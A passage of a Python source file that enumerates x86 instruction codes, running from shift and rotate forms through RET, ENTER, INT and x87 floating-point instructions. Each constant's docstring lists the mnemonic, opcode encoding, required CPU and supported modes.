``C0 /2 ib``
``186+``
``16/32/64-bit``
"""
RCR_RM8_IMM8: int = 362
"""
``RCR r/m8, imm8``
``C0 /3 ib``
``186+``
``16/32/64-bit``
"""
SHL_RM8_IMM8: int = 363
"""
``SHL r/m8, imm8``
``C0 /4 ib``
``186+``
``16/32/64-bit``
"""
SHR_RM8_IMM8: int = 364
"""
``SHR r/m8, imm8``
``C0 /5 ib``
``186+``
``16/32/64-bit``
"""
SAL_RM8_IMM8: int = 365
"""
``SAL r/m8, imm8``
``C0 /6 ib``
``186+``
``16/32/64-bit``
"""
SAR_RM8_IMM8: int = 366
"""
``SAR r/m8, imm8``
``C0 /7 ib``
``186+``
``16/32/64-bit``
"""
ROL_RM16_IMM8: int = 367
"""
``ROL r/m16, imm8``
``o16 C1 /0 ib``
``186+``
``16/32/64-bit``
"""
ROL_RM32_IMM8: int = 368
"""
``ROL r/m32, imm8``
``o32 C1 /0 ib``
``386+``
``16/32/64-bit``
"""
ROL_RM64_IMM8: int = 369
"""
``ROL r/m64, imm8``
``o64 C1 /0 ib``
``X64``
``64-bit``
"""
ROR_RM16_IMM8: int = 370
"""
``ROR r/m16, imm8``
``o16 C1 /1 ib``
``186+``
``16/32/64-bit``
"""
ROR_RM32_IMM8: int = 371
"""
``ROR r/m32, imm8``
``o32 C1 /1 ib``
``386+``
``16/32/64-bit``
"""
ROR_RM64_IMM8: int = 372
"""
``ROR r/m64, imm8``
``o64 C1 /1 ib``
``X64``
``64-bit``
"""
RCL_RM16_IMM8: int = 373
"""
``RCL r/m16, imm8``
``o16 C1 /2 ib``
``186+``
``16/32/64-bit``
"""
RCL_RM32_IMM8: int = 374
"""
``RCL r/m32, imm8``
``o32 C1 /2 ib``
``386+``
``16/32/64-bit``
"""
RCL_RM64_IMM8: int = 375
"""
``RCL r/m64, imm8``
``o64 C1 /2 ib``
``X64``
``64-bit``
"""
RCR_RM16_IMM8: int = 376
"""
``RCR r/m16, imm8``
``o16 C1 /3 ib``
``186+``
``16/32/64-bit``
"""
RCR_RM32_IMM8: int = 377
"""
``RCR r/m32, imm8``
``o32 C1 /3 ib``
``386+``
``16/32/64-bit``
"""
RCR_RM64_IMM8: int = 378
"""
``RCR r/m64, imm8``
``o64 C1 /3 ib``
``X64``
``64-bit``
"""
SHL_RM16_IMM8: int = 379
"""
``SHL r/m16, imm8``
``o16 C1 /4 ib``
``186+``
``16/32/64-bit``
"""
SHL_RM32_IMM8: int = 380
"""
``SHL r/m32, imm8``
``o32 C1 /4 ib``
``386+``
``16/32/64-bit``
"""
SHL_RM64_IMM8: int = 381
"""
``SHL r/m64, imm8``
``o64 C1 /4 ib``
``X64``
``64-bit``
"""
SHR_RM16_IMM8: int = 382
"""
``SHR r/m16, imm8``
``o16 C1 /5 ib``
``186+``
``16/32/64-bit``
"""
SHR_RM32_IMM8: int = 383
"""
``SHR r/m32, imm8``
``o32 C1 /5 ib``
``386+``
``16/32/64-bit``
"""
SHR_RM64_IMM8: int = 384
"""
``SHR r/m64, imm8``
``o64 C1 /5 ib``
``X64``
``64-bit``
"""
SAL_RM16_IMM8: int = 385
"""
``SAL r/m16, imm8``
``o16 C1 /6 ib``
``186+``
``16/32/64-bit``
"""
SAL_RM32_IMM8: int = 386
"""
``SAL r/m32, imm8``
``o32 C1 /6 ib``
``386+``
``16/32/64-bit``
"""
SAL_RM64_IMM8: int = 387
"""
``SAL r/m64, imm8``
``o64 C1 /6 ib``
``X64``
``64-bit``
"""
SAR_RM16_IMM8: int = 388
"""
``SAR r/m16, imm8``
``o16 C1 /7 ib``
``186+``
``16/32/64-bit``
"""
SAR_RM32_IMM8: int = 389
"""
``SAR r/m32, imm8``
``o32 C1 /7 ib``
``386+``
``16/32/64-bit``
"""
SAR_RM64_IMM8: int = 390
"""
``SAR r/m64, imm8``
``o64 C1 /7 ib``
``X64``
``64-bit``
"""
RETNW_IMM16: int = 391
"""
``RET imm16``
``o16 C2 iw``
``8086+``
``16/32/64-bit``
"""
RETND_IMM16: int = 392
"""
``RET imm16``
``o32 C2 iw``
``386+``
``16/32-bit``
"""
RETNQ_IMM16: int = 393
"""
``RET imm16``
``o64 C2 iw``
``X64``
``64-bit``
"""
RETNW: int = 394
"""
``RET``
``o16 C3``
``8086+``
``16/32/64-bit``
"""
RETND: int = 395
"""
``RET``
``o32 C3``
``386+``
``16/32-bit``
"""
RETNQ: int = 396
"""
``RET``
``o64 C3``
``X64``
``64-bit``
"""
LES_R16_M1616: int = 397
"""
``LES r16, m16:16``
``o16 C4 /r``
``8086+``
``16/32-bit``
"""
LES_R32_M1632: int = 398
"""
``LES r32, m16:32``
``o32 C4 /r``
``386+``
``16/32-bit``
"""
LDS_R16_M1616: int = 399
"""
``LDS r16, m16:16``
``o16 C5 /r``
``8086+``
``16/32-bit``
"""
LDS_R32_M1632: int = 400
"""
``LDS r32, m16:32``
``o32 C5 /r``
``386+``
``16/32-bit``
"""
MOV_RM8_IMM8: int = 401
"""
``MOV r/m8, imm8``
``C6 /0 ib``
``8086+``
``16/32/64-bit``
"""
XABORT_IMM8: int = 402
"""
``XABORT imm8``
``C6 F8 ib``
``RTM``
``16/32/64-bit``
"""
MOV_RM16_IMM16: int = 403
"""
``MOV r/m16, imm16``
``o16 C7 /0 iw``
``8086+``
``16/32/64-bit``
"""
MOV_RM32_IMM32: int = 404
"""
``MOV r/m32, imm32``
``o32 C7 /0 id``
``386+``
``16/32/64-bit``
"""
MOV_RM64_IMM32: int = 405
"""
``MOV r/m64, imm32``
``o64 C7 /0 id``
``X64``
``64-bit``
"""
XBEGIN_REL16: int = 406
"""
``XBEGIN rel16``
``o16 C7 F8 cw``
``RTM``
``16/32/64-bit``
"""
XBEGIN_REL32: int = 407
"""
``XBEGIN rel32``
``o32 C7 F8 cd``
``RTM``
``16/32/64-bit``
"""
ENTERW_IMM16_IMM8: int = 408
"""
``ENTER imm16, imm8``
``o16 C8 iw ib``
``186+``
``16/32/64-bit``
"""
ENTERD_IMM16_IMM8: int = 409
"""
``ENTER imm16, imm8``
``o32 C8 iw ib``
``386+``
``16/32-bit``
"""
ENTERQ_IMM16_IMM8: int = 410
"""
``ENTER imm16, imm8``
``o64 C8 iw ib``
``X64``
``64-bit``
"""
LEAVEW: int = 411
"""
``LEAVE``
``o16 C9``
``186+``
``16/32/64-bit``
"""
LEAVED: int = 412
"""
``LEAVE``
``o32 C9``
``386+``
``16/32-bit``
"""
LEAVEQ: int = 413
"""
``LEAVE``
``o64 C9``
``X64``
``64-bit``
"""
RETFW_IMM16: int = 414
"""
``RETF imm16``
``o16 CA iw``
``8086+``
``16/32/64-bit``
"""
RETFD_IMM16: int = 415
"""
``RETF imm16``
``o32 CA iw``
``386+``
``16/32/64-bit``
"""
RETFQ_IMM16: int = 416
"""
``RETF imm16``
``o64 CA iw``
``X64``
``64-bit``
"""
RETFW: int = 417
"""
``RETF``
``o16 CB``
``8086+``
``16/32/64-bit``
"""
RETFD: int = 418
"""
``RETF``
``o32 CB``
``386+``
``16/32/64-bit``
"""
RETFQ: int = 419
"""
``RETF``
``o64 CB``
``X64``
``64-bit``
"""
INT3: int = 420
"""
``INT3``
``CC``
``8086+``
``16/32/64-bit``
"""
INT_IMM8: int = 421
"""
``INT imm8``
``CD ib``
``8086+``
``16/32/64-bit``
"""
INTO: int = 422
"""
``INTO``
``CE``
``8086+``
``16/32-bit``
"""
IRETW: int = 423
"""
``IRET``
``o16 CF``
``8086+``
``16/32/64-bit``
"""
IRETD: int = 424
"""
``IRETD``
``o32 CF``
``386+``
``16/32/64-bit``
"""
IRETQ: int = 425
"""
``IRETQ``
``o64 CF``
``X64``
``64-bit``
"""
ROL_RM8_1: int = 426
"""
``ROL r/m8, 1``
``D0 /0``
``8086+``
``16/32/64-bit``
"""
ROR_RM8_1: int = 427
"""
``ROR r/m8, 1``
``D0 /1``
``8086+``
``16/32/64-bit``
"""
RCL_RM8_1: int = 428
"""
``RCL r/m8, 1``
``D0 /2``
``8086+``
``16/32/64-bit``
"""
RCR_RM8_1: int = 429
"""
``RCR r/m8, 1``
``D0 /3``
``8086+``
``16/32/64-bit``
"""
SHL_RM8_1: int = 430
"""
``SHL r/m8, 1``
``D0 /4``
``8086+``
``16/32/64-bit``
"""
SHR_RM8_1: int = 431
"""
``SHR r/m8, 1``
``D0 /5``
``8086+``
``16/32/64-bit``
"""
SAL_RM8_1: int = 432
"""
``SAL r/m8, 1``
``D0 /6``
``8086+``
``16/32/64-bit``
"""
SAR_RM8_1: int = 433
"""
``SAR r/m8, 1``
``D0 /7``
``8086+``
``16/32/64-bit``
"""
ROL_RM16_1: int = 434
"""
``ROL r/m16, 1``
``o16 D1 /0``
``8086+``
``16/32/64-bit``
"""
ROL_RM32_1: int = 435
"""
``ROL r/m32, 1``
``o32 D1 /0``
``386+``
``16/32/64-bit``
"""
ROL_RM64_1: int = 436
"""
``ROL r/m64, 1``
``o64 D1 /0``
``X64``
``64-bit``
"""
ROR_RM16_1: int = 437
"""
``ROR r/m16, 1``
``o16 D1 /1``
``8086+``
``16/32/64-bit``
"""
ROR_RM32_1: int = 438
"""
``ROR r/m32, 1``
``o32 D1 /1``
``386+``
``16/32/64-bit``
"""
ROR_RM64_1: int = 439
"""
``ROR r/m64, 1``
``o64 D1 /1``
``X64``
``64-bit``
"""
RCL_RM16_1: int = 440
"""
``RCL r/m16, 1``
``o16 D1 /2``
``8086+``
``16/32/64-bit``
"""
RCL_RM32_1: int = 441
"""
``RCL r/m32, 1``
``o32 D1 /2``
``386+``
``16/32/64-bit``
"""
RCL_RM64_1: int = 442
"""
``RCL r/m64, 1``
``o64 D1 /2``
``X64``
``64-bit``
"""
RCR_RM16_1: int = 443
"""
``RCR r/m16, 1``
``o16 D1 /3``
``8086+``
``16/32/64-bit``
"""
RCR_RM32_1: int = 444
"""
``RCR r/m32, 1``
``o32 D1 /3``
``386+``
``16/32/64-bit``
"""
RCR_RM64_1: int = 445
"""
``RCR r/m64, 1``
``o64 D1 /3``
``X64``
``64-bit``
"""
SHL_RM16_1: int = 446
"""
``SHL r/m16, 1``
``o16 D1 /4``
``8086+``
``16/32/64-bit``
"""
SHL_RM32_1: int = 447
"""
``SHL r/m32, 1``
``o32 D1 /4``
``386+``
``16/32/64-bit``
"""
SHL_RM64_1: int = 448
"""
``SHL r/m64, 1``
``o64 D1 /4``
``X64``
``64-bit``
"""
SHR_RM16_1: int = 449
"""
``SHR r/m16, 1``
``o16 D1 /5``
``8086+``
``16/32/64-bit``
"""
SHR_RM32_1: int = 450
"""
``SHR r/m32, 1``
``o32 D1 /5``
``386+``
``16/32/64-bit``
"""
SHR_RM64_1: int = 451
"""
``SHR r/m64, 1``
``o64 D1 /5``
``X64``
``64-bit``
"""
SAL_RM16_1: int = 452
"""
``SAL r/m16, 1``
``o16 D1 /6``
``8086+``
``16/32/64-bit``
"""
SAL_RM32_1: int = 453
"""
``SAL r/m32, 1``
``o32 D1 /6``
``386+``
``16/32/64-bit``
"""
SAL_RM64_1: int = 454
"""
``SAL r/m64, 1``
``o64 D1 /6``
``X64``
``64-bit``
"""
SAR_RM16_1: int = 455
"""
``SAR r/m16, 1``
``o16 D1 /7``
``8086+``
``16/32/64-bit``
"""
SAR_RM32_1: int = 456
"""
``SAR r/m32, 1``
``o32 D1 /7``
``386+``
``16/32/64-bit``
"""
SAR_RM64_1: int = 457
"""
``SAR r/m64, 1``
``o64 D1 /7``
``X64``
``64-bit``
"""
ROL_RM8_CL: int = 458
"""
``ROL r/m8, CL``
``D2 /0``
``8086+``
``16/32/64-bit``
"""
ROR_RM8_CL: int = 459
"""
``ROR r/m8, CL``
``D2 /1``
``8086+``
``16/32/64-bit``
"""
RCL_RM8_CL: int = 460
"""
``RCL r/m8, CL``
``D2 /2``
``8086+``
``16/32/64-bit``
"""
RCR_RM8_CL: int = 461
"""
``RCR r/m8, CL``
``D2 /3``
``8086+``
``16/32/64-bit``
"""
SHL_RM8_CL: int = 462
"""
``SHL r/m8, CL``
``D2 /4``
``8086+``
``16/32/64-bit``
"""
SHR_RM8_CL: int = 463
"""
``SHR r/m8, CL``
``D2 /5``
``8086+``
``16/32/64-bit``
"""
SAL_RM8_CL: int = 464
"""
``SAL r/m8, CL``
``D2 /6``
``8086+``
``16/32/64-bit``
"""
SAR_RM8_CL: int = 465
"""
``SAR r/m8, CL``
``D2 /7``
``8086+``
``16/32/64-bit``
"""
ROL_RM16_CL: int = 466
"""
``ROL r/m16, CL``
``o16 D3 /0``
``8086+``
``16/32/64-bit``
"""
ROL_RM32_CL: int = 467
"""
``ROL r/m32, CL``
``o32 D3 /0``
``386+``
``16/32/64-bit``
"""
ROL_RM64_CL: int = 468
"""
``ROL r/m64, CL``
``o64 D3 /0``
``X64``
``64-bit``
"""
ROR_RM16_CL: int = 469
"""
``ROR r/m16, CL``
``o16 D3 /1``
``8086+``
``16/32/64-bit``
"""
ROR_RM32_CL: int = 470
"""
``ROR r/m32, CL``
``o32 D3 /1``
``386+``
``16/32/64-bit``
"""
ROR_RM64_CL: int = 471
"""
``ROR r/m64, CL``
``o64 D3 /1``
``X64``
``64-bit``
"""
RCL_RM16_CL: int = 472
"""
``RCL r/m16, CL``
``o16 D3 /2``
``8086+``
``16/32/64-bit``
"""
RCL_RM32_CL: int = 473
"""
``RCL r/m32, CL``
``o32 D3 /2``
``386+``
``16/32/64-bit``
"""
RCL_RM64_CL: int = 474
"""
``RCL r/m64, CL``
``o64 D3 /2``
``X64``
``64-bit``
"""
RCR_RM16_CL: int = 475
"""
``RCR r/m16, CL``
``o16 D3 /3``
``8086+``
``16/32/64-bit``
"""
RCR_RM32_CL: int = 476
"""
``RCR r/m32, CL``
``o32 D3 /3``
``386+``
``16/32/64-bit``
"""
RCR_RM64_CL: int = 477
"""
``RCR r/m64, CL``
``o64 D3 /3``
``X64``
``64-bit``
"""
SHL_RM16_CL: int = 478
"""
``SHL r/m16, CL``
``o16 D3 /4``
``8086+``
``16/32/64-bit``
"""
SHL_RM32_CL: int = 479
"""
``SHL r/m32, CL``
``o32 D3 /4``
``386+``
``16/32/64-bit``
"""
SHL_RM64_CL: int = 480
"""
``SHL r/m64, CL``
``o64 D3 /4``
``X64``
``64-bit``
"""
SHR_RM16_CL: int = 481
"""
``SHR r/m16, CL``
``o16 D3 /5``
``8086+``
``16/32/64-bit``
"""
SHR_RM32_CL: int = 482
"""
``SHR r/m32, CL``
``o32 D3 /5``
``386+``
``16/32/64-bit``
"""
SHR_RM64_CL: int = 483
"""
``SHR r/m64, CL``
``o64 D3 /5``
``X64``
``64-bit``
"""
SAL_RM16_CL: int = 484
"""
``SAL r/m16, CL``
``o16 D3 /6``
``8086+``
``16/32/64-bit``
"""
SAL_RM32_CL: int = 485
"""
``SAL r/m32, CL``
``o32 D3 /6``
``386+``
``16/32/64-bit``
"""
SAL_RM64_CL: int = 486
"""
``SAL r/m64, CL``
``o64 D3 /6``
``X64``
``64-bit``
"""
SAR_RM16_CL: int = 487
"""
``SAR r/m16, CL``
``o16 D3 /7``
``8086+``
``16/32/64-bit``
"""
SAR_RM32_CL: int = 488
"""
``SAR r/m32, CL``
``o32 D3 /7``
``386+``
``16/32/64-bit``
"""
SAR_RM64_CL: int = 489
"""
``SAR r/m64, CL``
``o64 D3 /7``
``X64``
``64-bit``
"""
AAM_IMM8: int = 490
"""
``AAM imm8``
``D4 ib``
``8086+``
``16/32-bit``
"""
AAD_IMM8: int = 491
"""
``AAD imm8``
``D5 ib``
``8086+``
``16/32-bit``
"""
SALC: int = 492
"""
``SALC``
``D6``
``8086+``
``16/32-bit``
"""
XLAT_M8: int = 493
"""
``XLATB``
``D7``
``8086+``
``16/32/64-bit``
"""
FADD_M32FP: int = 494
"""
``FADD m32fp``
``D8 /0``
``8087+``
``16/32/64-bit``
"""
FMUL_M32FP: int = 495
"""
``FMUL m32fp``
``D8 /1``
``8087+``
``16/32/64-bit``
"""
FCOM_M32FP: int = 496
"""
``FCOM m32fp``
``D8 /2``
``8087+``
``16/32/64-bit``
"""
FCOMP_M32FP: int = 497
"""
``FCOMP m32fp``
``D8 /3``
``8087+``
``16/32/64-bit``
"""
FSUB_M32FP: int = 498
"""
``FSUB m32fp``
``D8 /4``
``8087+``
``16/32/64-bit``
"""
FSUBR_M32FP: int = 499
"""
``FSUBR m32fp``
``D8 /5``
``8087+``
``16/32/64-bit``
"""
FDIV_M32FP: int = 500
"""
``FDIV m32fp``
``D8 /6``
``8087+``
``16/32/64-bit``
"""
FDIVR_M32FP: int = 501
"""
``FDIVR m32fp``
``D8 /7``
``8087+``
``16/32/64-bit``
"""
FADD_ST0_STI: int = 502
"""
``FADD ST(0), ST(i)``
``D8 C0+i``
``8087+``
``16/32/64-bit``
"""
FMUL_ST0_STI: int = 503
"""
``FMUL ST(0), ST(i)``
``D8 C8+i``
``8087+``
``16/32/64-bit``
"""
FCOM_ST0_STI: int = 504
"""
``FCOM ST(i)``
``D8 D0+i``
``8087+``
``16/32/64-bit``
"""
FCOMP_ST0_STI: int = 505
"""
``FCOMP ST(i)``
``D8 D8+i``
``8087+``
``16/32/64-bit``
"""
FSUB_ST0_STI: int = 506
"""
``FSUB ST(0), ST(i)``
``D8 E0+i``
``8087+``
``16/32/64-bit``
"""
FSUBR_ST0_STI: int = 507
"""
``FSUBR ST(0), ST(i)``
``D8 E8+i``
``8087+``
``16/32/64-bit``
"""
FDIV_ST0_STI: int = 508
"""
``FDIV ST(0), ST(i)``
``D8 F0+i``
``8087+``
``16/32/64-bit``
"""
FDIVR_ST0_STI: int = 509
"""
``FDIVR ST(0), ST(i)``
``D8 F8+i``
``8087+``
``16/32/64-bit``
"""
FLD_M32FP: int = 510
"""
``FLD m32fp``
``D9 /0``
``8087+``
``16/32/64-bit``
"""
FST_M32FP: int = 511
"""
``FST m32fp``
``D9 /2``
``8087+``
``16/32/64-bit``
"""
FSTP_M32FP: int = 512
"""
``FSTP m32fp``
``D9 /3``
``8087+``
``16/32/64-bit``
"""
FLDENV_M14BYTE: int = 513
"""
``FLDENV m14byte``
``o16 D9 /4``
``8087+``
``16/32/64-bit``
"""
FLDENV_M28BYTE: int = 514
"""
``FLDENV m28byte``
``o32 D9 /4``
``387+``
``16/32/64-bit``
"""
FLDCW_M2BYTE: int = 515
"""
``FLDCW m2byte``
``D9 /5``
``8087+``
``16/32/64-bit``
"""
FNSTENV_M14BYTE: int = 516
"""
``FNSTENV m14byte``
``o16 D9 /6``
``8087+``
``16/32/64-bit``
"""
FSTENV_M14BYTE: int = 517
"""
``FSTENV m14byte``
``9B o16 D9 /6``
``8087+``
``16/32/64-bit``
"""
FNSTENV_M28BYTE: int = 518
"""
``FNSTENV m28byte``
``o32 D9 /6``
``387+``
``16/32/64-bit``
"""
FSTENV_M28BYTE: int = 519
"""
``FSTENV m28byte``
``9B o32 D9 /6``
``387+``
``16/32/64-bit``
"""
FNSTCW_M2BYTE: int = 520
"""
``FNSTCW m2byte``
``D9 /7``
``8087+``
``16/32/64-bit``
"""
FSTCW_M2BYTE: int = 521
"""
``FSTCW m2byte``
``9B D9 /7``
``8087+``
``16/32/64-bit``
"""
FLD_STI: int = 522
"""
``FLD ST(i)``
``D9 C0+i``
``8087+``
``16/32/64-bit``
"""
FXCH_ST0_STI: int = 523
"""
``FXCH ST(i)``
``D9 C8+i``
``8087+``
``16/32/64-bit``
"""
FNOP: int = 524
"""
``FNOP``
``D9 D0``
``8087+``
``16/32/64-bit``
"""
FSTPNCE_STI: int = 525
"""
``FSTPNCE ST(i)``
``D9 D8+i``
``8087+``
``16/32/64-bit``
"""
FCHS: int = 526
"""
``FCHS``
``D9 E0``
``8087+``
``16/32/64-bit``
"""
FABS: int = 527
"""
``FABS``
``D9 E1``
``8087+``
``16/32/64-bit``
"""
FTST: int = 528
"""
``FTST``
``D9 E4``
``8087+``
``16/32/64-bit``
"""
FXAM: int = 529
"""
``FXAM``
``D9 E5``
``8087+``
``16/32/64-bit``
"""
FLD1: int = 530
"""
``FLD1``
``D9 E8``
``8087+``
``16/32/64-bit``
"""
FLDL2T: int = 531
"""
``FLDL2T``
``D9 E9``
``8087+``
``16/32/64-bit``
"""
FLDL2E: int = 532
"""
``FLDL2E``
``D9 EA``
``8087+``
``16/32/64-bit``
"""
FLDPI: int = 533
"""
``FLDPI``
``D9 EB``
``8087+``
``16/32/64-bit``
"""
FLDLG2: int = 534
"""
``FLDLG2``
``D9 EC``
``8087+``
``16/32/64-bit``
"""
FLDLN2: int = 535
"""
``FLDLN2``
``D9 ED``
``8087+``
``16/32/64-bit``
"""
FLDZ: int = 536
"""
``FLDZ``
``D9 EE``
``8087+``
``16/32/64-bit``
"""
F2XM1: int = 537
"""
``F2XM1``
``D9 F0``
``8087+``
``16/32/64-bit``
"""
FYL2X: int = 538
"""
``FYL2X``
``D9 F1``
``8087+``
``16/32/64-bit``
"""
FPTAN: int = 539
"""
``FPTAN``
``D9 F2``
``8087+``
``16/32/64-bit``
"""
FPATAN: int = 540
"""
``FPATAN``
``D9 F3``
``8087+``
``16/32/64-bit``
"""
FXTRACT: int = 541
"""
``FXTRACT``
``D9 F4``
``8087+``
``16/32/64-bit``
"""
FPREM1: int = 542
"""
``FPREM1``
``D9 F5``
``387+``
``16/32/64-bit``
"""
FDECSTP: int = 543
"""
``FDECSTP``
``D9 F6``
``8087+``
``16/32/64-bit``
"""
FINCSTP: int = 544
"""
``FINCSTP``
``D9 F7``
``8087+``
``16/32/64-bit``
"""
FPREM: int = 545
"""
``FPREM``
``D9 F8``
``8087+``
``16/32/64-bit``
"""
FYL2XP1: int = 546
"""
``FYL2XP1``
``D9 F9``
``8087+``
``16/32/64-bit``
"""
FSQRT: int = 547
"""
``FSQRT``
``D9 FA``
``8087+``
``16/32/64-bit``
"""
FSINCOS: int = 548
"""
``FSINCOS``
``D9 FB``
``387+``
``16/32/64-bit``
"""
FRNDINT: int = 549
"""
``FRNDINT``
``D9 FC``
``8087+``
``16/32/64-bit``
"""
FSCALE: int = 550
"""
``FSCALE``
``D9 FD``
``8087+``
``16/32/64-bit``
"""
FSIN: int = 551
"""
``FSIN``
``D9 FE``
``387+``
``16/32/64-bit``
"""
FCOS: int = 552
"""
``FCOS``
``D9 FF``
``387+``
``16/32/64-bit``
"""
FIADD_M32INT: int = 553
"""
``FIADD m32int``
``DA /0``
``8087+``
``16/32/64-bit``
"""
FIMUL_M32INT: int = 554
"""
``FIMUL m32int``
``DA /1``
``8087+``
``16/32/64-bit``
"""
FICOM_M32INT: int = 555
"""
``FICOM m32int``
``DA /2``
``8087+``
``16/32/64-bit``
"""
FICOMP_M32INT: int = 556
"""
``FICOMP m32int``
``DA /3``
``8087+``
``16/32/64-bit``
"""
FISUB_M32INT: int = 557
"""
``FISUB m32int``
``DA /4``
``8087+``
``16/32/64-bit``
"""
FISUBR_M32INT: int = 558
"""
``FISUBR m32int``
``DA /5``
``8087+``
``16/32/64-bit``
"""
FIDIV_M32INT: int = 559
"""
``FIDIV m32int``
``DA /6``
``8087+``
``16/32/64-bit``
"""
FIDIVR_M32INT: int = 560
"""
``FIDIVR m32int``
``DA /7``
``8087+``
``16/32/64-bit``
"""
FCMOVB_ST0_STI: int = 561
"""
``FCMOVB ST(0), ST(i)``
``DA C0+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FCMOVE_ST0_STI: int = 562
"""
``FCMOVE ST(0), ST(i)``
``DA C8+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FCMOVBE_ST0_STI: int = 563
"""
``FCMOVBE ST(0), ST(i)``
``DA D0+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FCMOVU_ST0_STI: int = 564
"""
``FCMOVU ST(0), ST(i)``
``DA D8+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FUCOMPP: int = 565
"""
``FUCOMPP``
``DA E9``
``387+``
``16/32/64-bit``
"""
FILD_M32INT: int = 566
"""
``FILD m32int``
``DB /0``
``8087+``
``16/32/64-bit``
"""
FISTTP_M32INT: int = 567
"""
``FISTTP m32int``
``DB /1``
``8087+ and SSE3``
``16/32/64-bit``
"""
FIST_M32INT: int = 568
"""
``FIST m32int``
``DB /2``
``8087+``
``16/32/64-bit``
"""
FISTP_M32INT: int = 569
"""
``FISTP m32int``
``DB /3``
``8087+``
``16/32/64-bit``
"""
FLD_M80FP: int = 570
"""
``FLD m80fp``
``DB /5``
``8087+``
``16/32/64-bit``
"""
FSTP_M80FP: int = 571
"""
``FSTP m80fp``
``DB /7``
``8087+``
``16/32/64-bit``
"""
FCMOVNB_ST0_STI: int = 572
"""
``FCMOVNB ST(0), ST(i)``
``DB C0+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FCMOVNE_ST0_STI: int = 573
"""
``FCMOVNE ST(0), ST(i)``
``DB C8+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FCMOVNBE_ST0_STI: int = 574
"""
``FCMOVNBE ST(0), ST(i)``
``DB D0+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FCMOVNU_ST0_STI: int = 575
"""
``FCMOVNU ST(0), ST(i)``
``DB D8+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FNENI: int = 576
"""
``FNENI``
``DB E0``
``8087+``
``16/32/64-bit``
"""
FENI: int = 577
"""
``FENI``
``9B DB E0``
``8087+``
``16/32/64-bit``
"""
FNDISI: int = 578
"""
``FNDISI``
``DB E1``
``8087+``
``16/32/64-bit``
"""
FDISI: int = 579
"""
``FDISI``
``9B DB E1``
``8087+``
``16/32/64-bit``
"""
FNCLEX: int = 580
"""
``FNCLEX``
``DB E2``
``8087+``
``16/32/64-bit``
"""
FCLEX: int = 581
"""
``FCLEX``
``9B DB E2``
``8087+``
``16/32/64-bit``
"""
FNINIT: int = 582
"""
``FNINIT``
``DB E3``
``8087+``
``16/32/64-bit``
"""
FINIT: int = 583
"""
``FINIT``
``9B DB E3``
``8087+``
``16/32/64-bit``
"""
FNSETPM: int = 584
"""
``FNSETPM``
``DB E4``
``287+``
``16/32/64-bit``
"""
FSETPM: int = 585
"""
``FSETPM``
``9B DB E4``
``287+``
``16/32/64-bit``
"""
FRSTPM: int = 586
"""
``FRSTPM``
``DB E5``
``287 XL``
``16/32-bit``
"""
FUCOMI_ST0_STI: int = 587
"""
``FUCOMI ST, ST(i)``
``DB E8+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FCOMI_ST0_STI: int = 588
"""
``FCOMI ST, ST(i)``
``DB F0+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FADD_M64FP: int = 589
"""
``FADD m64fp``
``DC /0``
``8087+``
``16/32/64-bit``
"""
FMUL_M64FP: int = 590
"""
``FMUL m64fp``
``DC /1``
``8087+``
``16/32/64-bit``
"""
FCOM_M64FP: int = 591
"""
``FCOM m64fp``
``DC /2``
``8087+``
``16/32/64-bit``
"""
FCOMP_M64FP: int = 592
"""
``FCOMP m64fp``
``DC /3``
``8087+``
``16/32/64-bit``
"""
FSUB_M64FP: int = 593
"""
``FSUB m64fp``
``DC /4``
``8087+``
``16/32/64-bit``
"""
FSUBR_M64FP: int = 594
"""
``FSUBR m64fp``
``DC /5``
``8087+``
``16/32/64-bit``
"""
FDIV_M64FP: int = 595
"""
``FDIV m64fp``
``DC /6``
``8087+``
``16/32/64-bit``
"""
FDIVR_M64FP: int = 596
"""
``FDIVR m64fp``
``DC /7``
``8087+``
``16/32/64-bit``
"""
FADD_STI_ST0: int = 597
"""
``FADD ST(i), ST(0)``
``DC C0+i``
``8087+``
``16/32/64-bit``
"""
FMUL_STI_ST0: int = 598
"""
``FMUL ST(i), ST(0)``
``DC C8+i``
``8087+``
``16/32/64-bit``
"""
FCOM_ST0_STI_DCD0: int = 599
"""
``FCOM ST(i)``
``DC D0+i``
``8087+``
``16/32/64-bit``
"""
FCOMP_ST0_STI_DCD8: int = 600
"""
``FCOMP ST(i)``
``DC D8+i``
``8087+``
``16/32/64-bit``
"""
FSUBR_STI_ST0: int = 601
"""
``FSUBR ST(i), ST(0)``
``DC E0+i``
``8087+``
``16/32/64-bit``
"""
FSUB_STI_ST0: int = 602
"""
``FSUB ST(i), ST(0)``
``DC E8+i``
``8087+``
``16/32/64-bit``
"""
FDIVR_STI_ST0: int = 603
"""
``FDIVR ST(i), ST(0)``
``DC F0+i``
``8087+``
``16/32/64-bit``
"""
FDIV_STI_ST0: int = 604
"""
``FDIV ST(i), ST(0)``
``DC F8+i``
``8087+``
``16/32/64-bit``
"""
FLD_M64FP: int = 605
"""
``FLD m64fp``
``DD /0``
``8087+``
``16/32/64-bit``
"""
FISTTP_M64INT: int = 606
"""
``FISTTP m64int``
``DD /1``
``8087+ and SSE3``
``16/32/64-bit``
"""
FST_M64FP: int = 607
"""
``FST m64fp``
``DD /2``
``8087+``
``16/32/64-bit``
"""
FSTP_M64FP: int = 608
"""
``FSTP m64fp``
``DD /3``
``8087+``
``16/32/64-bit``
"""
FRSTOR_M94BYTE: int = 609
"""
``FRSTOR m94byte``
``o16 DD /4``
``8087+``
``16/32/64-bit``
"""
FRSTOR_M108BYTE: int = 610
"""
``FRSTOR m108byte``
``o32 DD /4``
``387+``
``16/32/64-bit``
"""
FNSAVE_M94BYTE: int = 611
"""
``FNSAVE m94byte``
``o16 DD /6``
``8087+``
``16/32/64-bit``
"""
FSAVE_M94BYTE: int = 612
"""
``FSAVE m94byte``
``9B o16 DD /6``
``8087+``
``16/32/64-bit``
"""
FNSAVE_M108BYTE: int = 613
"""
``FNSAVE m108byte``
``o32 DD /6``
``387+``
``16/32/64-bit``
"""
FSAVE_M108BYTE: int = 614
"""
``FSAVE m108byte``
``9B o32 DD /6``
``387+``
``16/32/64-bit``
"""
FNSTSW_M2BYTE: int = 615
"""
``FNSTSW m2byte``
